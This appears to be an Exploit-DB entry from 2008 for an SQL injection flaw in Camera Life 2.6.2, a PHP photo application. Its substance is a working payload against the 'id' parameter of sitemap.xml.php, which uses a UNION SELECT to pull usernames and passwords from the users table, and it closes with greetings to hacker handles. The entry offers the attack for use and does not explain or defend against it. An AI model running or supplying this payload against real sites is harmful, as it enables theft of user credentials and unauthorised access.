Camera Life 2.6.2 - 'id' SQL Injection

EDB-ID:

6132


Author:

nuclear

Type:

webapps


Platform:

PHP

Date:

2008-07-25


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#Camera Life 2.6.2(id) Sql Injection Vulnerability



#Author: nuclear



#script: http://downloads.sourceforge.net/fdcl/cameralife-2.6.2aa.zip



#exploit: sitemap.xml.php?page=photos&id=999999 union select concat(username,0x3a,password),null from users --



#greetz cAs, Mi4night, zYzTeM ,THE_MAN, DiGitalX, sys32r, sys32-hack, Digitalfortress, and me :P

# milw0rm.com [2008-07-25]